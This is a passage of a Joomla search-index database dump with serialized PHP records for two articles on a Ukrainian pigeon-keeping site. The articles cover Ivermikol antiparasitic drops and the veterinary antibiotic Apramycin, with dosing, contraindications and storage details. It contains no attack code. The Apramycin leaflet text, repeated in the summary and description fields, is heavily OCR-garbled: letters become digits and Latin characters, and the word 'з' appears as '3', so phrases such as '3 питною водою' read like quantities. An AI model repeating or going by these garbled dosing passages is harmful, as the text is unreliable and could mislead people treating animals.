тижнів або вагою менше 100 г.<br>  Не застосовувати під час основного сезону линьки.<br>  Не застосовувати хворим та ослабленим птахам.<br>  <br>  Застереження:<br>  Запобігати попаданню препарату на слизові оболонки і в травний канал.<br>  При появі клінічних ознак ускладнень після обробки птиці препаратом звернутися  до лікаря ветеринарної медицини.<br>  Після обробки препаратом птицю не рекомендується купати протягом 2 годин до  повного висихання пір’яного покриву, не можна гладити і допускати її до  маленьких дітей.<br>  При випадковому попаданні препарату на шкіру або слизові оболонки необхідно  відразу промити їх проточною водою.<br>  Після закінчення обробки птиці необхідно вимити руки з милом.<br>  <br>  Форма випуску:<br>  Полімерні флакони по 10 мл.<br>  <br>  Зберiгання:<br>  Сухе темне недоступне для дітей місце за температури від 5° до 25 °С.<br>  <br>  Термін придатності:<br>  2 роки.<br>  <br>  Виробник готового продукту:<br>  ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89.</p><p><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-03 06:10:25\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:34:\"2463:ivermikol-dlya-golubiv-krapli\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:78:\"/index.php/holuby/informatsiia-holubivnykam/2463-ivermikol-dlya-golubiv-krapli\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2463\";s:5:\"route\";s:89:\"index.php?option=com_content&view=article&id=2463:ivermikol-dlya-golubiv-krapli&catid=135\";s:5:\"title\";s:55:\"Івермікол для голубів (краплі)\";s:11:\"description\";s:3966:\" Склад: Препарат містить діючу речовину: івермектин Фармакологічні властивості: АТСvet QP54AA, авермектини (QP54AA01, івермектин). Препарат має широкий спектр протипаразитарної дії, активний відносно вошей, кліщів, бліх, пухопероїдів та кишкових нематод. Діюча речовина препарату, івермектин, належить до хімічної групи макроциклічних лактонів. Фармакологічна дія івермектину полягає у блокаді нервової або нервово-м′язової передачі шляхом впливу на γ-аміномасляну кислоту (ГАМК), внаслідок чого порушується передача нервових імпульсів ектопаразитів і нематод, що призводить до їх паралічу і загибелі. Дорослі паразити, які паразитують на тілі птиці, після обробки препаратом “Івермікол” гинуть через 2-3 доби, дія препарату триває до 30 діб. Застосування: Лікування і профілактика голубів та декоративних птахів при ураженні ектопаразитами: кліщами, вошами, блохами, пухопероїдами та при кишкових нематодозах. Дозування: Препарат застосовувати зовнішньо одноразово. Наносити на суху та непошкоджену шкіру між лопатками птиці в наступних кількостях: 1 крапля на голуба вагою 250 г; 2 краплі на голубавагою 500 г; 1 крапля для декоративних птахів (папуг, канарок). У разі необхідності, процедуру можна повторити через 4-6 тижнів. Протипоказання: Не застосовувати птахам молодше 8 тижнів або вагою менше 100 г. Не застосовувати під час основного сезону линьки. Не застосовувати хворим та ослабленим птахам. Застереження: Запобігати попаданню препарату на слизові оболонки і в травний канал. При появі клінічних ознак ускладнень після обробки птиці препаратом звернутися до лікаря ветеринарної медицини. Після обробки препаратом птицю не рекомендується купати протягом 2 годин до повного висихання пір’яного покриву, не можна гладити і допускати її до маленьких дітей. При випадковому попаданні препарату на шкіру або слизові оболонки необхідно відразу промити їх проточною водою. Після закінчення обробки птиці необхідно вимити руки з милом. Форма випуску: Полімерні флакони по 10 мл. Зберiгання: Сухе темне недоступне для дітей місце за температури від 5° до 25 °С. Термін придатності: 2 роки. Виробник готового продукту: ПП фірма “Фарматон”, 33000, Україна, м. Рівне, вул. Дворецька, 89. \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2020-09-03 06:10:25\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2020-09-03 06:10:25\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4626,'index.php?option=com_content&view=article&id=2464','index.php?option=com_content&view=article&id=2464:apramitsin-100-g-huvepharma-bolgariya&catid=135','Апраміцин 100 г Huvepharma (Болгарія)',' Самый современный из антибиотиков группы аминогликозидов. Широчайший спектр действия, высокая эффективность и надежность. Апраміцин® водорозчинний порошок (водорозчинний порошок для перорального застосування) листівка-вкладка Опис Порошок білого або кремового кольору. Склад 1 г препарату містить діючу речовину: апраміцину сульфат (в перерахунку на основу) - 500 мг. ДопоміжнI речовини: кремнезем колоїдний безводний, лактози моногідрат. Фармакологічні властивості АТС vеt класифікаційний код QJ01 - антибактеріальні ветеринарні препарати для системного застосування.QJ01GB90 - Апраміцин. Апраміцин — це аміноглікозидний антибіотик, що характеризується бактерицидною дією, яка полягає у гальмуванні білкового синтезу бактеріальної клітини. Активно діє на грамнегативні (Bordetella bronchiseptica ,E.coli, Vibrio coli, Klebsiella spp., Pseudomonas aeruginosa, Shidella sonnei, Salmonella spp.,Proteus spp.), деякі грампозитивні мікроорганізми (Staphylococcus aureus,Streptococcus haemolyticus) та мікоплазми (Мусоplasma hyopneumoniae). При пероральному введенн1 повIльно всмокту€ться 1 створюе високI антибактер1альн1 концентрац11\" у травному канаМ. Препарат не метаболізується і характеризуєтьсянизькою токсичністю. Виводиться з організму, головним чином, з фекаліями і частково з сечею. Застосування Телята (вIком до 3 м1сяцIв): лIкування тварин, хворих на колIбактер1оз 1 сальмонельоз, що спричинен1 мIкроорган1змами, чутливими до апрам1цину. Поросята (вIком до 120 дIб): лIкування тварин, хворих на ентерити, що спричинен1 мIкроорган1змами, чутливими до апрам1цину. Ягнята (вIком до 3 м1сяцIв): лIкування тварин, хворих на колIбактер1оз, що спричинений мIкроорган1змами, чутливими до апрам1цину. КролI: лIкування тварин при захворюваннях травного каналу, що спричинен1 мIкроорган1змами, чутливими до апрам1цину. Курчата, кури-бройлери: лIкування птицI, хворо\'I на септицем1ю, що спричинена мIкроорган1змами, чутливими до апрам1цину. Дозування Перорально 3 питною водою або зам1нниками молока у дозах: телята (вIком до 3 мIсяц1в) - 40-80 мг препарату на 1 кг маси тIла (20-40 мг апрам1цину на 1 кг маси тIла) щодобово протягом 5 д1б; поросята (вIком до 120 ДIб) — 500-1000 мг препарату на 1 л питноI\' води, що становить 7,5-12,5 мг д1ючоI\' речовини на 1 кг маси тIла (250-500 мг апрам1цину на 1 л питноI\' води) щодобово протягом 7 д1б; ягнята (вIком до 3 м1сяцIв) — 20-40 мгпрепарату на 1 кг маси тIла (10-20 мг апрам1цину на 1 кг маси тIла) щодобово протягом 3-5 д1б; кролі - 100-200 мг препарату на 1 л питної води, що становить 10-15 мг діючої речовини на 1 кг маси тіла (50-100 мг апрам1цину на 1 л питної води) щодобово протягом 5-8 діб; або100-200 мг препарату на 1 кг корму, що становить 5-10 мг діючої речовини на 1 кг маси тіла (50-100 мг апраміцину на 1 кг корму) щодобово протягом 3 тижнів; курчата, кури-бройлери - 0,5-1 г препарату на 1 л питної води, що становить 25-50 мг діючої речовини на 1 кг маси тіла (250-500 мг апраміцину на 1 л питної води) щодобово протягом 7 діб. Протипоказання Підвищена чутливість до апраміцину. Не застосовувати курям-несучкам, яйця яких призначені для споживання людьми. Препарат не застосовувати котам. Не застосовувати одночасно 3 бета-лактамними антибіотиками у зв\'язку зі зниженням антибактеріального ефекту. Не змішувати з іншими лікарськими засобами. Не застосовувати тваринам у період вагітності та лактації. Застереження Забій тварин на м\'ясо дозволяють через 28 діб (телята) після останнього застосування препарату. Споживання м\'яса поросят, ягнят, кролів та курчат дозволяють безобмежень. Отримане, до зазначеного терміну, м\'ясо утилізують або згодовують непродуктивним тваринам, залежно від висновку лікаря ветеринарної медицини. Перед застосуванням систему поїння необхідно попередньо очистити від іржі. Форма випуску Пластикові банки по 50 г або 100 г, вкриті пластиковими кришками типу «кришка у кришці» 13 встановленим захисним кільцем. Пакувальний матеріал виготовлений 13 поліетилену низької щільності. Зберігання Сухе, темне, недоступне для дітей місце при температурі від 5 °С до 25 °С. , Термін придатності — 2 роки. Готовий розчин 3 препаратом необхідно використати протягом 3 діб, за умови зберігання його у темному місці при температурі від 2 °С до 8 °С. Для застосування у ветеринарній медицині! ','2020-09-03 09:49:59','a274fc158d42ea65cfc34802ab4b57a3',1,1,1,'*','2020-09-03 06:49:59','0000-00-00 00:00:00','2020-09-03 06:49:59','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2464\";s:5:\"alias\";s:37:\"apramitsin-100-g-huvepharma-bolgariya\";s:7:\"summary\";s:7797:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/apramicin.jpg\"><img src=\"https://malehus.in.ua/images/stories/apramicin.jpg\" alt=\"\" class=\"fr-fir fr-dii\"></a></p><p>Самый современный из  антибиотиков группы аминогликозидов. Широчайший спектр действия, высокая  эффективность и надежность.</p><p>Апраміцин® водорозчинний  порошок (водорозчинний порошок для перорального застосування) листівка-вкладка</p><p>Опис Порошок білого або  кремового кольору.</p><p>Склад 1 г препарату містить  діючу речовину: апраміцину сульфат (в перерахунку на основу) - 500 мг. ДопоміжнI речовини: кремнезем колоїдний  безводний, лактози моногідрат.</p><p>Фармакологічні властивості</p><p>АТС vеt класифікаційний код QJ01 - антибактеріальні ветеринарні препарати для системного застосування.QJ01GB90 - Апраміцин.</p><p>Апраміцин — це аміноглікозидний  антибіотик, що характеризується бактерицидною дією, яка полягає у гальмуванні білкового синтезу бактеріальної клітини. Активно діє на грамнегативні (Bordetella bronchiseptica ,E.coli, Vibrio coli, Klebsiella spp., Pseudomonas aeruginosa, Shidella sonnei, Salmonella spp.,Proteus spp.), деякі грампозитивні мікроорганізми (Staphylococcus aureus,Streptococcus haemolyticus) та мікоплазми (Мусоplasma hyopneumoniae).</p><p>При пероральному введенн1 повIльно всмокту€ться 1 створюе  високI антибактер1альн1 концентрац11\" у травному канаМ. Препарат не  метаболізується і характеризується низькою токсичністю. Виводиться з організму, головним чином, з фекаліями і частково з сечею.</p><p>Застосування</p><p>Телята (вIком до 3 м1сяцIв): лIкування тварин, хворих на колIбактер1оз 1 сальмонельоз, що  спричинен1 мIкроорган1змами, чутливими до апрам1цину.</p><p>Поросята (вIком до 120 дIб): лIкування тварин, хворих на  ентерити, що спричинен1 мIкроорган1змами, чутливими до апрам1цину.</p><p>Ягнята (вIком до 3 м1сяцIв): лIкування тварин, хворих на колIбактер1оз, що спричинений мIкроорган1змами, чутливими до  апрам1цину.</p><p>КролI: лIкування тварин при  захворюваннях травного каналу, що спричинен1 мIкроорган1змами, чутливими до апрам1цину.</p><p>Курчата, кури-бройлери: лIкування птицI, хворо\'I на септицем1ю, що спричинена мIкроорган1змами, чутливими до  апрам1цину.</p><p>Дозування</p><p>Перорально 3 питною водою або  зам1нниками молока у дозах: телята (вIком до 3 мIсяц1в) - 40-80 мг препарату на 1 кг маси тIла (20-40 мг апрам1цину на 1 кг  маси тIла) щодобово протягом 5 д1б;</p><p>поросята (вIком до 120 ДIб) — 500-1000 мг препарату на 1  л питноI\' води, що становить 7,5-12,5 мг д1ючоI\' речовини на 1 кг маси тIла (250-500 мг апрам1цину на 1  л питноI\' води) щодобово протягом 7 д1б;</p><p>ягнята (вIком до 3 м1сяцIв) — 20-40 мг препарату на 1 кг  маси тIла (10-20 мг апрам1цину на 1 кг маси тIла) щодобово протягом 3-5 д1б;</p><p>кролі - 100-200 мг препарату на 1 л питної води, що становить 10-15 мг діючої речовини на 1 кг маси тіла (50-100 мг апрам1цину на 1 л питної води)  щодобово протягом 5-8 діб; або100-200 мг препарату на 1 кг корму, що становить  5-10 мг діючої речовини на 1 кг маси тіла (50-100 мг апраміцину на 1 кг корму) щодобово  протягом 3 тижнів;</p><p><strong>курчата, кури-бройлери - 0,5-1 г препарату на 1 л питної води, що становить 25-50 мг діючої речовини на 1 кг маси тіла  (250-500 мг апраміцину на 1 л питної води) щодобово протягом 7 діб.</strong></p><p>Протипоказання</p><p>Підвищена чутливість до  апраміцину. Не застосовувати курям-несучкам, яйця яких призначені для споживання людьми. Препарат не застосовувати котам.  </p><p>Не застосовувати одночасно 3  бета-лактамними антибіотиками у зв\'язку зі зниженням антибактеріального ефекту. Не  змішувати з іншими лікарськими засобами. Не застосовувати тваринам у період вагітності та лактації.</p><p>Застереження</p><p>Забій тварин на м\'ясо  дозволяють через 28 діб (телята) після останнього застосування препарату.  Споживання м\'яса поросят, ягнят, кролів та курчат дозволяють без обмежень.  Отримане, до зазначеного терміну, м\'ясо утилізують або згодовують  непродуктивним тваринам, залежно від висновку лікаря ветеринарної медицини. Перед застосуванням систему поїння необхідно попередньо очистити  від іржі.</p><p>Форма випуску</p><p>Пластикові банки по 50 г або 100 г, вкриті пластиковими кришками типу «кришка у  кришці» 13 встановленим захисним кільцем. Пакувальний матеріал виготовлений 13  поліетилену низької щільності.</p><p>Зберігання</p><p>Сухе, темне, недоступне для  дітей місце при температурі від 5 °С до 25 °С. , Термін придатності — 2 роки. Готовий розчин 3 препаратом необхідно використати протягом 3 діб,  за умови зберігання його у темному місці при температурі від 2 °С до 8 °С. Для застосування у ветеринарній медицині!</p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"135\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2020-09-03 06:49:59\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:45:\"Інформація голубівникам\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:42:\"2464:apramitsin-100-g-huvepharma-bolgariya\";s:7:\"catslug\";s:29:\"135:informatsiia-holubivnykam\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:86:\"/index.php/holuby/informatsiia-holubivnykam/2464-apramitsin-100-g-huvepharma-bolgariya\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:45:\"Інформація голубівникам\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:45:\"Інформація голубівникам\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2464\";s:5:\"route\";s:97:\"index.php?option=com_content&view=article&id=2464:apramitsin-100-g-huvepharma-bolgariya&catid=135\";s:5:\"title\";s:55:\"Апраміцин 100 г Huvepharma (Болгарія)\";s:11:\"description\";s:7390:\" Самый современный из антибиотиков группы аминогликозидов. Широчайший спектр действия, высокая эффективность и надежность. Апраміцин® водорозчинний порошок (водорозчинний порошок для перорального застосування) листівка-вкладка Опис Порошок білого або кремового кольору. Склад 1 г препарату містить діючу речовину: апраміцину сульфат (в перерахунку на основу) - 500 мг. ДопоміжнI речовини: кремнезем колоїдний безводний, лактози моногідрат. Фармакологічні властивості АТС vеt класифікаційний код QJ01 - антибактеріальні ветеринарні препарати для системного застосування.QJ01GB90 - Апраміцин. Апраміцин — це аміноглікозидний антибіотик, що характеризується бактерицидною дією, яка полягає у гальмуванні білкового синтезу бактеріальної клітини. Активно діє на грамнегативні (Bordetella bronchiseptica ,E.coli, Vibrio coli, Klebsiella spp., Pseudomonas aeruginosa, Shidella sonnei, Salmonella spp.,Proteus spp.), деякі грампозитивні мікроорганізми (Staphylococcus aureus,Streptococcus haemolyticus) та мікоплазми (Мусоplasma hyopneumoniae). При пероральному введенн1 повIльно всмокту€ться 1 створюе високI антибактер1альн1 концентрац11\" у травному канаМ. Препарат не метаболізується і характеризуєтьсянизькою токсичністю. Виводиться з організму, головним чином, з фекаліями і частково з сечею. Застосування Телята (вIком до 3 м1сяцIв): лIкування тварин, хворих на колIбактер1оз 1 сальмонельоз, що спричинен1 мIкроорган1змами, чутливими до апрам1цину. Поросята (вIком до 120 дIб): лIкування тварин, хворих на ентерити, що спричинен1 мIкроорган1змами, чутливими до апрам1цину. Ягнята (вIком до 3 м1сяцIв): лIкування тварин, хворих на колIбактер1оз, що спричинений мIкроорган1змами, чутливими до апрам1цину. КролI: лIкування тварин при захворюваннях травного каналу, що спричинен1 мIкроорган1змами, чутливими до апрам1цину. Курчата, кури-бройлери: лIкування птицI, хворо\'I на септицем1ю, що спричинена мIкроорган1змами, чутливими до апрам1цину. Дозування Перорально 3 питною водою або зам1нниками молока у дозах: телята (вIком до 3 мIсяц1в) - 40-80 мг препарату на 1 кг маси тIла (20-40 мг апрам1цину на 1 кг маси тIла) щодобово протягом 5 д1б; поросята (вIком до 120 ДIб) — 500-1000 мг препарату на 1 л питноI\' води, що становить 7,5-12,5 мг д1ючоI\' речовини на 1 кг маси тIла (250-500 мг апрам1цину на 1 л питноI\' води) щодобово 